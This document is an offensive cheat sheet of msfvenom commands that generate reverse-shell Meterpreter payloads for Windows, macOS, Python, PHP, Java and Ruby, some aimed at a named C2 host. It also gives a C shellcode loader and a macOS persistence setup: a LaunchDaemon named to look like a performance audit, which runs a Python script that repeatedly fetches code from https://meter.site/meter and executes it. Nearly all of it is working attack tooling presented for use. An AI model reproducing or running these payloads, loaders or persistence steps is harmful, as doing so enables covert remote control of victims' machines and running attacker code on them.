Msfvenom payload generation

Some msfvenom commands

Windows x64 reverse TCP Meterpreter payload

# Exe output

msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_tcp LHOST=cc.vuln.be LPORT=51337 SessionExpirationTimeout=0 SessionCommunicationTimeout=0 -f exe -o win64https.exe

# Generates a payload in 'C' format that is encrypted with RC4. 
# You need to build your own loader in C/C++.

msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_tcp LHOST=cc.vuln.be LPORT=51337 SessionExpirationTimeout=0 SessionCommunicationTimeout=0 EXITFUNC=thread -f powershell -t 0 -e generic/none

Windows x64 reverse HTTPS Meterpreter payload

msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_https LHOST=cc.vuln.be LPORT=443 SessionExpirationTimeout=0 SessionCommunicationTimeout=0 -f exe -o win64https.exe

Windows x32 reverse TCP Meterpreter payload

msfvenom -a x32 --platform windows -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1337 -e x86/shikata_ga_nai -i 3 -f exe -o payload.exe

Windows x64 reverse HTTPS powershell Meterpteter payload

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=127.0.0.1 LPORT=443 -e cmd/powershell_base64 -f psh -o payload.ps1

Python reverse HTTPS Meterpreter payload

msfvenom --platform python -p python/meterpreter/reverse_https LHOST=cc.vuln.be LPORT=443 SessionExpirationTimeout=0 SessionCommunicationTimeout=0 -o pythonHttps.py

PHP reverse TCP Meterpreter payload

msfvenom -p php/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1337 -e php/base64 -f raw -o payload.php

OSX x64 reverse TCP Meterpreter payload

msfvenom -p osx/x64/meterpreter_reverse_tcp LHOST=127.0.0.1 LPORT=51339 -f macho -o payload.bin

Java reverse TCP Meterpreter payload

msfvenom --platform java -f jar -p java/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1337 -o payload.jar

Java reverse TCP shell JSP payload

msfvenom -p java/jsp_shell_reverse_tcp LHOST=127.0.0.1 LPORT=1337 -o payload.jsp

Ruby reverse TCP Meterpreter payload

msfvenom --platform ruby -p ruby/shell_reverse_tcp LHOST=127.0.0.1 LPORT=1337 -o payload.rb

Custom loader

# Loader
char code[] = "shellcode";

int main(int argc, char **argv)
{
  int (*func)();
  func = (int (*)()) code;
  (int)(*func)();
}

// or
int (*ret)() = (int(*)())buf; ret();

Persistence

cat /etc/vendor/touch

#!/usr/bin/python
# ...

/Library/LaunchDaemons/com.support.PerfomanceAudit.plist:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>Label</key>
    <string>com.support.PerfomanceAudit</string>
    <key>LaunchOnlyOnce</key>
    <true/>
    <key>ProgramArguments</key>
    <array>
        <string>/etc/vendor/touch</string>
    </array>
    <key>RunAtLoad</key>
    <true/>
</dict>
</plist>

chmod +x /etc/vendor/touch

#!/usr/bin/python

import sys
import time
u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',))

while True:
    try:
        r=u.urlopen('https://meter.site/meter')
        exec(r.read())
        exit(0)      
    except:
        time.sleep(60)
        continue